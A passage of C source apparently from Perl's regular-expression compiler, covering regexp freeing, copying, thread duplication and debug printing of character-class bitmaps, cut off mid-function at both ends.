PERL_UNUSED_ARG(prog);
PERL_UNUSED_ARG(reginfo);
PERL_UNUSED_ARG(pRExC_state);
#endif /* DEBUGGING */
}
SV *
Perl_re_intuit_string(pTHX_ REGEXP * const r)
{ /* Assume that RE_INTUIT is set */
struct regexp *const prog = ReANY(r);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_RE_INTUIT_STRING;
PERL_UNUSED_CONTEXT;
DEBUG_COMPILE_r(
{
const char * const s = SvPV_nolen_const(RX_UTF8(r)
? prog->check_utf8 : prog->check_substr);
if (!PL_colorset) reginitcolors();
Perl_re_printf( aTHX_
"%sUsing REx %ssubstr:%s \"%s%.60s%s%s\"\n",
PL_colors[4],
RX_UTF8(r) ? "utf8 " : "",
PL_colors[5], PL_colors[0],
s,
PL_colors[1],
(strlen(s) > PL_dump_re_max_len ? "..." : ""));
} );
/* use UTF8 check substring if regexp pattern itself is in UTF8 */
return RX_UTF8(r) ? prog->check_utf8 : prog->check_substr;
}
/*
pregfree()
handles refcounting and freeing the perl core regexp structure. When
it is necessary to actually free the structure the first thing it
does is call the 'free' method of the regexp_engine associated to
the regexp, allowing the handling of the void *pprivate; member
first. (This routine is not overridable by extensions, which is why
the extensions free is called first.)
See regdupe and regdupe_internal if you change anything here.
*/
#ifndef PERL_IN_XSUB_RE
void
Perl_pregfree(pTHX_ REGEXP *r)
{
SvREFCNT_dec(r);
}
void
Perl_pregfree2(pTHX_ REGEXP *rx)
{
struct regexp *const r = ReANY(rx);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_PREGFREE2;
if (! r)
return;
if (r->mother_re) {
ReREFCNT_dec(r->mother_re);
} else {
CALLREGFREE_PVT(rx); /* free the private data */
SvREFCNT_dec(RXp_PAREN_NAMES(r));
}
if (r->substrs) {
int i;
for (i = 0; i < 2; i++) {
SvREFCNT_dec(r->substrs->data[i].substr);
SvREFCNT_dec(r->substrs->data[i].utf8_substr);
}
Safefree(r->substrs);
}
RX_MATCH_COPY_FREE(rx);
#ifdef PERL_ANY_COW
SvREFCNT_dec(r->saved_copy);
#endif
Safefree(r->offs);
SvREFCNT_dec(r->qr_anoncv);
if (r->recurse_locinput)
Safefree(r->recurse_locinput);
}
/* reg_temp_copy()
Copy ssv to dsv, both of which should of type SVt_REGEXP or SVt_PVLV,
except that dsv will be created if NULL.
This function is used in two main ways. First to implement
$r = qr/....; $s = $$r;
Secondly, it is used as a hacky workaround to the structural issue of
match results
being stored in the regexp structure which is in turn stored in
PL_curpm/PL_reg_curpm. The problem is that due to qr// the pattern
could be PL_curpm in multiple contexts, and could require multiple
result sets being associated with the pattern simultaneously, such
as when doing a recursive match with (??{$qr})
The solution is to make a lightweight copy of the regexp structure
when a qr// is returned from the code executed by (??{$qr}) this
lightweight copy doesn't actually own any of its data except for
the starp/end and the actual regexp structure itself.
*/
REGEXP *
Perl_reg_temp_copy(pTHX_ REGEXP *dsv, REGEXP *ssv)
{
struct regexp *drx;
struct regexp *const srx = ReANY(ssv);
const bool islv = dsv && SvTYPE(dsv) == SVt_PVLV;
PERL_ARGS_ASSERT_REG_TEMP_COPY;
if (!dsv)
dsv = (REGEXP*) newSV_type(SVt_REGEXP);
else {
assert(SvTYPE(dsv) == SVt_REGEXP || (SvTYPE(dsv) == SVt_PVLV));
/* our only valid caller, sv_setsv_flags(), should have done
* a SV_CHECK_THINKFIRST_COW_DROP() by now */
assert(!SvOOK(dsv));
assert(!SvIsCOW(dsv));
assert(!SvROK(dsv));
if (SvPVX_const(dsv)) {
if (SvLEN(dsv))
Safefree(SvPVX(dsv));
SvPVX(dsv) = NULL;
}
SvLEN_set(dsv, 0);
SvCUR_set(dsv, 0);
SvOK_off((SV *)dsv);
if (islv) {
/* For PVLVs, the head (sv_any) points to an XPVLV, while
* the LV's xpvlenu_rx will point to a regexp body, which
* we allocate here */
REGEXP *temp = (REGEXP *)newSV_type(SVt_REGEXP);
assert(!SvPVX(dsv));
((XPV*)SvANY(dsv))->xpv_len_u.xpvlenu_rx = temp->sv_any;
temp->sv_any = NULL;
SvFLAGS(temp) = (SvFLAGS(temp) & ~SVTYPEMASK) | SVt_NULL;
SvREFCNT_dec_NN(temp);
/* SvCUR still resides in the xpvlv struct, so the regexp copy-
ing below will not set it. */
SvCUR_set(dsv, SvCUR(ssv));
}
}
/* This ensures that SvTHINKFIRST(sv) is true, and hence that
sv_force_normal(sv) is called. */
SvFAKE_on(dsv);
drx = ReANY(dsv);
SvFLAGS(dsv) |= SvFLAGS(ssv) & (SVf_POK|SVp_POK|SVf_UTF8);
SvPV_set(dsv, RX_WRAPPED(ssv));
/* We share the same string buffer as the original regexp, on which we
hold a reference count, incremented when mother_re is set below.
The string pointer is copied here, being part of the regexp struct.
*/
memcpy(&(drx->xpv_cur), &(srx->xpv_cur),
sizeof(regexp) - STRUCT_OFFSET(regexp, xpv_cur));
if (!islv)
SvLEN_set(dsv, 0);
if (srx->offs) {
const I32 npar = srx->nparens+1;
Newx(drx->offs, npar, regexp_paren_pair);
Copy(srx->offs, drx->offs, npar, regexp_paren_pair);
}
if (srx->substrs) {
int i;
Newx(drx->substrs, 1, struct reg_substr_data);
StructCopy(srx->substrs, drx->substrs, struct reg_substr_data);
for (i = 0; i < 2; i++) {
SvREFCNT_inc_void(drx->substrs->data[i].substr);
SvREFCNT_inc_void(drx->substrs->data[i].utf8_substr);
}
/* check_substr and check_utf8, if non-NULL, point to either their
anchored or float namesakes, and don't hold a second reference. */
}
RX_MATCH_COPIED_off(dsv);
#ifdef PERL_ANY_COW
drx->saved_copy = NULL;
#endif
drx->mother_re = ReREFCNT_inc(srx->mother_re ? srx->mother_re : ssv);
SvREFCNT_inc_void(drx->qr_anoncv);
if (srx->recurse_locinput)
Newx(drx->recurse_locinput, srx->nparens + 1, char *);
return dsv;
}
#endif
/* regfree_internal()
Free the private data in a regexp. This is overloadable by
extensions. Perl takes care of the regexp structure in pregfree(),
this covers the *pprivate pointer which technically perl doesn't
know about, however of course we have to handle the
regexp_internal structure when no extension is in use.
Note this is called before freeing anything in the regexp
structure.
*/
void
Perl_regfree_internal(pTHX_ REGEXP * const rx)
{
struct regexp *const r = ReANY(rx);
RXi_GET_DECL(r, ri);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REGFREE_INTERNAL;
if (! ri) {
return;
}
DEBUG_COMPILE_r({
if (!PL_colorset)
reginitcolors();
{
SV *dsv= sv_newmortal();
RE_PV_QUOTED_DECL(s, RX_UTF8(rx),
dsv, RX_PRECOMP(rx), RX_PRELEN(rx), PL_dump_re_max_len);
Perl_re_printf( aTHX_ "%sFreeing REx:%s %s\n",
PL_colors[4], PL_colors[5], s);
}
});
#ifdef RE_TRACK_PATTERN_OFFSETS
if (ri->u.offsets)
Safefree(ri->u.offsets); /* 20010421 MJD */
#endif
if (ri->code_blocks)
S_free_codeblocks(aTHX_ ri->code_blocks);
if (ri->data) {
int n = ri->data->count;
while (--n >= 0) {
/* If you add a ->what type here, update the comment in regcomp.h */
switch (ri->data->what[n]) {
case 'a':
case 'r':
case 's':
case 'S':
case 'u':
SvREFCNT_dec(MUTABLE_SV(ri->data->data[n]));
break;
case 'f':
Safefree(ri->data->data[n]);
break;
case 'l':
case 'L':
break;
case 'T':
{ /* Aho Corasick add-on structure for a trie node.
Used in stclass optimization only */
U32 refcount;
reg_ac_data *aho=(reg_ac_data*)ri->data->data[n];
#ifdef USE_ITHREADS
dVAR;
#endif
OP_REFCNT_LOCK;
refcount = --aho->refcount;
OP_REFCNT_UNLOCK;
if ( !refcount ) {
PerlMemShared_free(aho->states);
PerlMemShared_free(aho->fail);
/* do this last!!!! */
PerlMemShared_free(ri->data->data[n]);
/* we should only ever get called once, so
* assert as much, and also guard the free
* which /might/ happen twice. At the least
* it will make code anlyzers happy and it
* doesn't cost much. - Yves */
assert(ri->regstclass);
if (ri->regstclass) {
PerlMemShared_free(ri->regstclass);
ri->regstclass = 0;
}
}
}
break;
case 't':
{
/* trie structure. */
U32 refcount;
reg_trie_data *trie=(reg_trie_data*)ri->data->data[n];
#ifdef USE_ITHREADS
dVAR;
#endif
OP_REFCNT_LOCK;
refcount = --trie->refcount;
OP_REFCNT_UNLOCK;
if ( !refcount ) {
PerlMemShared_free(trie->charmap);
PerlMemShared_free(trie->states);
PerlMemShared_free(trie->trans);
if (trie->bitmap)
PerlMemShared_free(trie->bitmap);
if (trie->jump)
PerlMemShared_free(trie->jump);
PerlMemShared_free(trie->wordinfo);
/* do this last!!!! */
PerlMemShared_free(ri->data->data[n]);
}
}
break;
default:
Perl_croak(aTHX_ "panic: regfree data code '%c'",
ri->data->what[n]);
}
}
Safefree(ri->data->what);
Safefree(ri->data);
}
Safefree(ri);
}
#define av_dup_inc(s, t) MUTABLE_AV(sv_dup_inc((const SV *)s, t))
#define hv_dup_inc(s, t) MUTABLE_HV(sv_dup_inc((const SV *)s, t))
#define SAVEPVN(p, n) ((p) ? savepvn(p, n) : NULL)
/*
re_dup_guts - duplicate a regexp.
This routine is expected to clone a given regexp structure. It is only
compiled under USE_ITHREADS.
After all of the core data stored in struct regexp is duplicated
the regexp_engine.dupe method is used to copy any private data
stored in the *pprivate pointer. This allows extensions to handle
any duplication it needs to do.
See pregfree() and regfree_internal() if you change anything here.
*/
#if defined(USE_ITHREADS)
#ifndef PERL_IN_XSUB_RE
void
Perl_re_dup_guts(pTHX_ const REGEXP *sstr, REGEXP *dstr, CLONE_PARAMS *param)
{
dVAR;
I32 npar;
const struct regexp *r = ReANY(sstr);
struct regexp *ret = ReANY(dstr);
PERL_ARGS_ASSERT_RE_DUP_GUTS;
npar = r->nparens+1;
Newx(ret->offs, npar, regexp_paren_pair);
Copy(r->offs, ret->offs, npar, regexp_paren_pair);
if (ret->substrs) {
/* Do it this way to avoid reading from *r after the StructCopy().
That way, if any of the sv_dup_inc()s dislodge *r from the L1
cache, it doesn't matter. */
int i;
const bool anchored = r->check_substr
? r->check_substr == r->substrs->data[0].substr
: r->check_utf8 == r->substrs->data[0].utf8_substr;
Newx(ret->substrs, 1, struct reg_substr_data);
StructCopy(r->substrs, ret->substrs, struct reg_substr_data);
for (i = 0; i < 2; i++) {
ret->substrs->data[i].substr =
sv_dup_inc(ret->substrs->data[i].substr, param);
ret->substrs->data[i].utf8_substr =
sv_dup_inc(ret->substrs->data[i].utf8_substr, param);
}
/* check_substr and check_utf8, if non-NULL, point to either their
anchored or float namesakes, and don't hold a second reference. */
if (ret->check_substr) {
if (anchored) {
assert(r->check_utf8 == r->substrs->data[0].utf8_substr);
ret->check_substr = ret->substrs->data[0].substr;
ret->check_utf8 = ret->substrs->data[0].utf8_substr;
} else {
assert(r->check_substr == r->substrs->data[1].substr);
assert(r->check_utf8 == r->substrs->data[1].utf8_substr);
ret->check_substr = ret->substrs->data[1].substr;
ret->check_utf8 = ret->substrs->data[1].utf8_substr;
}
} else if (ret->check_utf8) {
if (anchored) {
ret->check_utf8 = ret->substrs->data[0].utf8_substr;
} else {
ret->check_utf8 = ret->substrs->data[1].utf8_substr;
}
}
}
RXp_PAREN_NAMES(ret) = hv_dup_inc(RXp_PAREN_NAMES(ret), param);
ret->qr_anoncv = MUTABLE_CV(sv_dup_inc((const SV *)ret->qr_anoncv, param));
if (r->recurse_locinput)
Newx(ret->recurse_locinput, r->nparens + 1, char *);
if (ret->pprivate)
RXi_SET(ret, CALLREGDUPE_PVT(dstr, param));
if (RX_MATCH_COPIED(dstr))
ret->subbeg = SAVEPVN(ret->subbeg, ret->sublen);
else
ret->subbeg = NULL;
#ifdef PERL_ANY_COW
ret->saved_copy = NULL;
#endif
/* Whether mother_re be set or no, we need to copy the string. We
cannot refrain from copying it when the storage points directly to
our mother regexp, because that's
1: a buffer in a different thread
2: something we no longer hold a reference on
so we need to copy it locally. */
RX_WRAPPED(dstr) = SAVEPVN(RX_WRAPPED_const(sstr), SvCUR(sstr)+1);
/* set malloced length to a non-zero value so it will be freed
* (otherwise in combination with SVf_FAKE it looks like an alien
* buffer). It doesn't have to be the actual malloced size, since it
* should never be grown */
SvLEN_set(dstr, SvCUR(sstr)+1);
ret->mother_re = NULL;
}
#endif /* PERL_IN_XSUB_RE */
/*
regdupe_internal()
This is the internal complement to regdupe() which is used to copy
the structure pointed to by the *pprivate pointer in the regexp.
This is the core version of the extension overridable cloning hook.
The regexp structure being duplicated will be copied by perl prior
to this and will be provided as the regexp *r argument, however
with the /old/ structures pprivate pointer value. Thus this routine
may override any copying normally done by perl.
It returns a pointer to the new regexp_internal structure.
*/
void *
Perl_regdupe_internal(pTHX_ REGEXP * const rx, CLONE_PARAMS *param)
{
dVAR;
struct regexp *const r = ReANY(rx);
regexp_internal *reti;
int len;
RXi_GET_DECL(r, ri);
PERL_ARGS_ASSERT_REGDUPE_INTERNAL;
len = ProgLen(ri);
Newxc(reti, sizeof(regexp_internal) + len*sizeof(regnode),
char, regexp_internal);
Copy(ri->program, reti->program, len+1, regnode);
if (ri->code_blocks) {
int n;
Newx(reti->code_blocks, 1, struct reg_code_blocks);
Newx(reti->code_blocks->cb, ri->code_blocks->count,
struct reg_code_block);
Copy(ri->code_blocks->cb, reti->code_blocks->cb,
ri->code_blocks->count, struct reg_code_block);
for (n = 0; n < ri->code_blocks->count; n++)
reti->code_blocks->cb[n].src_regex = (REGEXP*)
sv_dup_inc((SV*)(ri->code_blocks->cb[n].src_regex), param);
reti->code_blocks->count = ri->code_blocks->count;
reti->code_blocks->refcnt = 1;
}
else
reti->code_blocks = NULL;
reti->regstclass = NULL;
if (ri->data) {
struct reg_data *d;
const int count = ri->data->count;
int i;
Newxc(d, sizeof(struct reg_data) + count*sizeof(void *),
char, struct reg_data);
Newx(d->what, count, U8);
d->count = count;
for (i = 0; i < count; i++) {
d->what[i] = ri->data->what[i];
switch (d->what[i]) {
/* see also regcomp.h and regfree_internal() */
case 'a': /* actually an AV, but the dup function is identical.
values seem to be "plain sv's" generally. */
case 'r': /* a compiled regex (but still just another SV) */
case 's': /* an RV (currently only used for an RV to an AV by the ANYOF code)
this use case should go away, the code could have used
'a' instead - see S_set_ANYOF_arg() for array contents. */
case 'S': /* actually an SV, but the dup function is identical. */
case 'u': /* actually an HV, but the dup function is identical.
values are "plain sv's" */
d->data[i] = sv_dup_inc((const SV *)ri->data->data[i], param);
break;
case 'f':
/* Synthetic Start Class - "Fake" charclass we generate to optimize
* patterns which could start with several different things. Pre-TRIE
* this was more important than it is now, however this still helps
* in some places, for instance /x?a+/ might produce a SSC equivalent
* to [xa]. This is used by Perl_re_intuit_start() and S_find_byclass()
* in regexec.c
*/
/* This is cheating. */
Newx(d->data[i], 1, regnode_ssc);
StructCopy(ri->data->data[i], d->data[i], regnode_ssc);
reti->regstclass = (regnode*)d->data[i];
break;
case 'T':
/* AHO-CORASICK fail table */
/* Trie stclasses are readonly and can thus be shared
* without duplication. We free the stclass in pregfree
* when the corresponding reg_ac_data struct is freed.
*/
reti->regstclass= ri->regstclass;
/* FALLTHROUGH */
case 't':
/* TRIE transition table */
OP_REFCNT_LOCK;
((reg_trie_data*)ri->data->data[i])->refcount++;
OP_REFCNT_UNLOCK;
/* FALLTHROUGH */
case 'l': /* (?{...}) or (??{ ... }) code (cb->block) */
case 'L': /* same when RExC_pm_flags & PMf_HAS_CV and code
is not from another regexp */
d->data[i] = ri->data->data[i];
break;
default:
Perl_croak(aTHX_ "panic: re_dup_guts unknown data code '%c'",
ri->data->what[i]);
}
}
reti->data = d;
}
else
reti->data = NULL;
reti->name_list_idx = ri->name_list_idx;
#ifdef RE_TRACK_PATTERN_OFFSETS
if (ri->u.offsets) {
Newx(reti->u.offsets, 2*len+1, U32);
Copy(ri->u.offsets, reti->u.offsets, 2*len+1, U32);
}
#else
SetProgLen(reti, len);
#endif
return (void*)reti;
}
#endif /* USE_ITHREADS */
#ifndef PERL_IN_XSUB_RE
/*
- regnext - dig the "next" pointer out of a node
*/
regnode *
Perl_regnext(pTHX_ regnode *p)
{
I32 offset;
if (!p)
return(NULL);
if (OP(p) > REGNODE_MAX) { /* regnode.type is unsigned */
Perl_croak(aTHX_ "Corrupted regexp opcode %d > %d",
(int)OP(p), (int)REGNODE_MAX);
}
offset = (reg_off_by_arg[OP(p)] ? ARG(p) : NEXT_OFF(p));
if (offset == 0)
return(NULL);
return(p+offset);
}
#endif
STATIC void
S_re_croak2(pTHX_ bool utf8, const char* pat1, const char* pat2,...)
{
va_list args;
STRLEN l1 = strlen(pat1);
STRLEN l2 = strlen(pat2);
char buf[512];
SV *msv;
const char *message;
PERL_ARGS_ASSERT_RE_CROAK2;
if (l1 > 510)
l1 = 510;
if (l1 + l2 > 510)
l2 = 510 - l1;
Copy(pat1, buf, l1 , char);
Copy(pat2, buf + l1, l2 , char);
buf[l1 + l2] = '\n';
buf[l1 + l2 + 1] = '\0';
va_start(args, pat2);
msv = vmess(buf, &args);
va_end(args);
message = SvPV_const(msv, l1);
if (l1 > 512)
l1 = 512;
Copy(message, buf, l1 , char);
/* l1-1 to avoid \n */
Perl_croak(aTHX_ "%" UTF8f, UTF8fARG(utf8, l1-1, buf));
}
/* XXX Here's a total kludge. But we need to re-enter for swash routines. */
#ifndef PERL_IN_XSUB_RE
void
Perl_save_re_context(pTHX)
{
I32 nparens = -1;
I32 i;
/* Save $1..$n (#18107: UTF-8 s/(\w+)/uc($1)/e); AMS 20021106. */
if (PL_curpm) {
const REGEXP * const rx = PM_GETRE(PL_curpm);
if (rx)
nparens = RX_NPARENS(rx);
}
/* RT #124109. This is a complete hack; in the SWASHNEW case we know
* that PL_curpm will be null, but that utf8.pm and the modules it
* loads will only use $1..$3.
* The t/porting/re_context.t test file checks this assumption.
*/
if (nparens == -1)
nparens = 3;
for (i = 1; i <= nparens; i++) {
char digits[TYPE_CHARS(long)];
const STRLEN len = my_snprintf(digits, sizeof(digits),
"%lu", (long)i);
GV *const *const gvp
= (GV**)hv_fetch(PL_defstash, digits, len, 0);
if (gvp) {
GV * const gv = *gvp;
if (SvTYPE(gv) == SVt_PVGV && GvSV(gv))
save_scalar(gv);
}
}
}
#endif
#ifdef DEBUGGING
STATIC void
S_put_code_point(pTHX_ SV *sv, UV c)
{
PERL_ARGS_ASSERT_PUT_CODE_POINT;
if (c > 255) {
Perl_sv_catpvf(aTHX_ sv, "\\x{%04" UVXf "}", c);
}
else if (isPRINT(c)) {
const char string = (char) c;
/* We use {phrase} as metanotation in the class, so also escape literal
* braces */
if (isBACKSLASHED_PUNCT(c) || c == '{' || c == '}')
sv_catpvs(sv, "\\");
sv_catpvn(sv, &string, 1);
}
else if (isMNEMONIC_CNTRL(c)) {
Perl_sv_catpvf(aTHX_ sv, "%s", cntrl_to_mnemonic((U8) c));
}
else {
Perl_sv_catpvf(aTHX_ sv, "\\x%02X", (U8) c);
}
}
#define MAX_PRINT_A MAX_PRINT_A_FOR_USE_ONLY_BY_REGCOMP_DOT_C
STATIC void
S_put_range(pTHX_ SV *sv, UV start, const UV end, const bool allow_literals)
{
/* Appends to 'sv' a displayable version of the range of code points from
* 'start' to 'end'. Mnemonics (like '\r') are used for the few controls
* that have them, when they occur at the beginning or end of the range.
* It uses hex to output the remaining code points, unless 'allow_literals'
* is true, in which case the printable ASCII ones are output as-is (though
* some of these will be escaped by put_code_point()).
*
* NOTE: This is designed only for printing ranges of code points that fit
* inside an ANYOF bitmap. Higher code points are simply suppressed
*/
const unsigned int min_range_count = 3;
assert(start <= end);
PERL_ARGS_ASSERT_PUT_RANGE;
while (start <= end) {
UV this_end;
const char * format;
if (end - start < min_range_count) {
/* Output chars individually when they occur in short ranges */
for (; start <= end; start++) {
put_code_point(sv, start);
}
break;
}
/* If permitted by the input options, and there is a possibility that
* this range contains a printable literal, look to see if there is
* one. */
if (allow_literals && start <= MAX_PRINT_A) {
/* If the character at the beginning of the range isn't an ASCII
* printable, effectively split the range into two parts:
* 1) the portion before the first such printable,
* 2) the rest
* and output them separately. */
if (! isPRINT_A(start)) {
UV temp_end = start + 1;
/* There is no point looking beyond the final possible
* printable, in MAX_PRINT_A */
UV max = MIN(end, MAX_PRINT_A);
while (temp_end <= max && ! isPRINT_A(temp_end)) {
temp_end++;
}
/* Here, temp_end points to one beyond the first printable if
* found, or to one beyond 'max' if not. If none found, make
* sure that we use the entire range */
if (temp_end > MAX_PRINT_A) {
temp_end = end + 1;
}
/* Output the first part of the split range: the part that
* doesn't have printables, with the parameter set to not look
* for literals (otherwise we would infinitely recurse) */
put_range(sv, start, temp_end - 1, FALSE);
/* The 2nd part of the range (if any) starts here. */
start = temp_end;
/* We do a continue, instead of dropping down, because even if
* the 2nd part is non-empty, it could be so short that we want
* to output it as individual characters, as tested for at the
* top of this loop. */
continue;
}
/* Here, 'start' is a printable ASCII. If it is an alphanumeric,
* output a sub-range of just the digits or letters, then process
* the remaining portion as usual. */
if (isALPHANUMERIC_A(start)) {
UV mask = (isDIGIT_A(start))
? _CC_DIGIT
: isUPPER_A(start)
? _CC_UPPER
: _CC_LOWER;
UV temp_end = start + 1;
/* Find the end of the sub-range that includes just the
* characters in the same class as the first character in it */
while (temp_end <= end && _generic_isCC_A(temp_end, mask)) {
temp_end++;
}
temp_end--;
/* For short ranges, don't duplicate the code above to output
* them; just call recursively */
if (temp_end - start < min_range_count) {
put_range(sv, start, temp_end, FALSE);
}
else { /* Output as a range */
put_code_point(sv, start);
sv_catpvs(sv, "-");
put_code_point(sv, temp_end);
}
start = temp_end + 1;
continue;
}
/* We output any other printables as individual characters */
if (isPUNCT_A(start) || isSPACE_A(start)) {
while (start <= end && (isPUNCT_A(start)
|| isSPACE_A(start)))
{
put_code_point(sv, start);
start++;
}
continue;
}
} /* End of looking for literals */
/* Here is not to output as a literal. Some control characters have
* mnemonic names. Split off any of those at the beginning and end of
* the range to print mnemonically. It isn't possible for many of
* these to be in a row, so this won't overwhelm with output */
if ( start <= end
&& (isMNEMONIC_CNTRL(start) || isMNEMONIC_CNTRL(end)))
{
while (isMNEMONIC_CNTRL(start) && start <= end) {
put_code_point(sv, start);
start++;
}
/* If this didn't take care of the whole range ... */
if (start <= end) {
/* Look backwards from the end to find the final non-mnemonic
* */
UV temp_end = end;
while (isMNEMONIC_CNTRL(temp_end)) {
temp_end--;
}
/* And separately output the interior range that doesn't start
* or end with mnemonics */
put_range(sv, start, temp_end, FALSE);
/* Then output the mnemonic trailing controls */
start = temp_end + 1;
while (start <= end) {
put_code_point(sv, start);
start++;
}
break;
}
}
/* As a final resort, output the range or subrange as hex. */
this_end = (end < NUM_ANYOF_CODE_POINTS)
? end
: NUM_ANYOF_CODE_POINTS - 1;
#if NUM_ANYOF_CODE_POINTS > 256
format = (this_end < 256)
? "\\x%02" UVXf "-\\x%02" UVXf
: "\\x{%04" UVXf "}-\\x{%04" UVXf "}";
#else
format = "\\x%02" UVXf "-\\x%02" UVXf;
#endif
GCC_DIAG_IGNORE_STMT(-Wformat-nonliteral);
Perl_sv_catpvf(aTHX_ sv, format, start, this_end);
GCC_DIAG_RESTORE_STMT;
break;
}
}
STATIC void
S_put_charclass_bitmap_innards_invlist(pTHX_ SV *sv, SV* invlist)
{
/* Concatenate onto the PV in 'sv' a displayable form of the inversion list
* 'invlist' */
UV start, end;
bool allow_literals = TRUE;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS_INVLIST;
/* Generally, it is more readable if printable characters are output as
* literals, but if a range (nearly) spans all of them, it's best to output
* it as a single range. This code will use a single range if all but 2
* ASCII printables are in it */
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
/* If the range starts beyond the final printable, it doesn't have any
* in it */
if (start > MAX_PRINT_A) {
break;
}
/* In both ASCII and EBCDIC, a SPACE is the lowest printable. To span
* all but two, the range must start and end no later than 2 from
* either end */
if (start < ' ' + 2 && end > MAX_PRINT_A - 2) {
if (end > MAX_PRINT_A) {
end = MAX_PRINT_A;
}
if (start < ' ') {
start = ' ';
}
if (end - start >= MAX_PRINT_A - ' ' - 2) {
allow_literals = FALSE;
}
break;
}
}
invlist_iterfinish(invlist);
/* Here we have figured things out. Output each range */
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (start >= NUM_ANYOF_CODE_POINTS) {
break;
}
put_range(sv, start, end, allow_literals);
}
invlist_iterfinish(invlist);
return;
}
STATIC SV*
S_put_charclass_bitmap_innards_common(pTHX_
SV* invlist, /* The bitmap */
SV* posixes, /* Under /l, things like [:word:], \S */
SV* only_utf8, /* Under /d, matches iff the target is UTF-8 */
SV* not_utf8, /* /d, matches iff the target isn't UTF-8 */
SV* only_utf8_locale, /* Under /l, matches if the locale is UTF-8 */
const bool invert /* Is the result to be inverted? */
)
{
/* Create and return an SV containing a displayable version of the bitmap
* and associated information determined by the input parameters. If the
* output would have been only the inversion indicator '^', NULL is instead
* returned. */
dVAR;
SV * output;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS_COMMON;
if (invert) {
output = newSVpvs("^");
}
else {
output = newSVpvs("");
}
/* First, the code points in the bitmap that are unconditionally there */
put_charclass_bitmap_innards_invlist(output, invlist);
/* Traditionally, these have been placed after the main code points */
if (posixes) {
sv_catsv(output, posixes);
}
if (only_utf8 && _invlist_len(only_utf8)) {
Perl_sv_catpvf(aTHX_ output, "%s{utf8}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, only_utf8);
}
if (not_utf8 && _invlist_len(not_utf8)) {
Perl_sv_catpvf(aTHX_ output, "%s{not utf8}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, not_utf8);
}
if (only_utf8_locale && _invlist_len(only_utf8_locale)) {
Perl_sv_catpvf(aTHX_ output, "%s{utf8 locale}%s", PL_colors[1], PL_colors[0]);
put_charclass_bitmap_innards_invlist(output, only_utf8_locale);
/* This is the only list in this routine that can legally contain code
* points outside the bitmap range. The call just above to
* 'put_charclass_bitmap_innards_invlist' will simply suppress them, so
* output them here. There's about a half-dozen possible, and none in
* contiguous ranges longer than 2 */
if (invlist_highest(only_utf8_locale) >= NUM_ANYOF_CODE_POINTS) {
UV start, end;
SV* above_bitmap = NULL;
_invlist_subtract(only_utf8_locale, PL_InBitmap, &above_bitmap);
invlist_iterinit(above_bitmap);
while (invlist_iternext(above_bitmap, &start, &end)) {
UV i;
for (i = start; i <= end; i++) {
put_code_point(output, i);
}
}
invlist_iterfinish(above_bitmap);
SvREFCNT_dec_NN(above_bitmap);
}
}
if (invert && SvCUR(output) == 1) {
return NULL;
}
return output;
}
STATIC bool
S_put_charclass_bitmap_innards(pTHX_ SV *sv,
char *bitmap,
SV *nonbitmap_invlist,
SV *only_utf8_locale_invlist,
const regnode * const node,
const bool force_as_is_display)
{
/* Appends to 'sv' a displayable version of the innards of the bracketed
* character class defined by the other arguments:
* 'bitmap' points to the bitmap, or NULL if to ignore that.
* 'nonbitmap_invlist' is an inversion list of the code points that are in
* the bitmap range, but for some reason aren't in the bitmap; NULL if
* none. The reasons for this could be that they require some
* condition such as the target string being or not being in UTF-8
* (under /d), or because they came from a user-defined property that
* was not resolved at the time of the regex compilation (under /u)
* 'only_utf8_locale_invlist' is an inversion list of the code points that
* are valid only if the runtime locale is a UTF-8 one; NULL if none
* 'node' is the regex pattern ANYOF node. It is needed only when the
* above two parameters are not null, and is passed so that this
* routine can tease apart the various reasons for them.
* 'force_as_is_display' is TRUE if this routine should definitely NOT try
* to invert things to see if that leads to a cleaner display. If
* FALSE, this routine is free to use its judgment about doing this.
*
* It returns TRUE if there was actually something output. (It may be that
* the bitmap, etc is empty.)
*
* When called for outputting the bitmap of a non-ANYOF node, just pass the
* bitmap, with the succeeding parameters set to NULL, and the final one to
* FALSE.
*/
/* In general, it tries to display the 'cleanest' representation of the
* innards, choosing whether to display them inverted or not, regardless of
* whether the class itself is to be inverted. However, there are some
* cases where it can't try inverting, as what actually matches isn't known
* until runtime, and hence the inversion isn't either. */
dVAR;
bool inverting_allowed = ! force_as_is_display;
int i;
STRLEN orig_sv_cur = SvCUR(sv);
SV* invlist; /* Inversion list we accumulate of code points that
are unconditionally matched */
SV* only_utf8 = NULL; /* Under /d, list of matches iff the target is
UTF-8 */
SV* not_utf8 = NULL; /* /d, list of matches iff the target isn't UTF-8
*/
SV* posixes = NULL; /* Under /l, string of things like [:word:], \D */
SV* only_utf8_locale = NULL; /* Under /l, list of matches if the locale
is UTF-8 */
SV* as_is_display; /* The output string when we take the inputs
literally */
SV* inverted_display; /* The output string when we invert the inputs */
U8 flags = (node) ? ANYOF_FLAGS(node) : 0;
bool invert = cBOOL(flags & ANYOF_INVERT); /* Is the input to be inverted
to match? */
/* We are biased in favor of displaying things without them being inverted,
* as that is generally easier to understand */
const int bias = 5;
PERL_ARGS_ASSERT_PUT_CHARCLASS_BITMAP_INNARDS;
/* Start off with whatever code points are passed in. (We clone, so we
* don't change the caller's list) */
if (nonbitmap_invlist) {
assert(invlist_highest(nonbitmap_invlist) < NUM_ANYOF_CODE_POINTS);
invlist = invlist_clone(nonbitmap_invlist, NULL);
}
else { /* Worst case size is every other code point is matched */
invlist = _new_invlist(NUM_ANYOF_CODE_POINTS / 2);
}
if (flags) {
if (OP(node) == ANYOFD) {
/* This flag indicates that the code points below 0x100 in the
* nonbitmap list are precisely the ones that match only when the
* target is UTF-8 (they should all be non-ASCII). */
if (flags & ANYOF_SHARED_d_UPPER_LATIN1_UTF8_STRING_MATCHES_non_d_RUNTIME_USER_PROP)
{
_invlist_intersection(invlist, PL_UpperLatin1, &only_utf8);
_invlist_subtract(invlist, only_utf8, &invlist);
}
/* And this flag for matching all non-ASCII 0xFF and below */
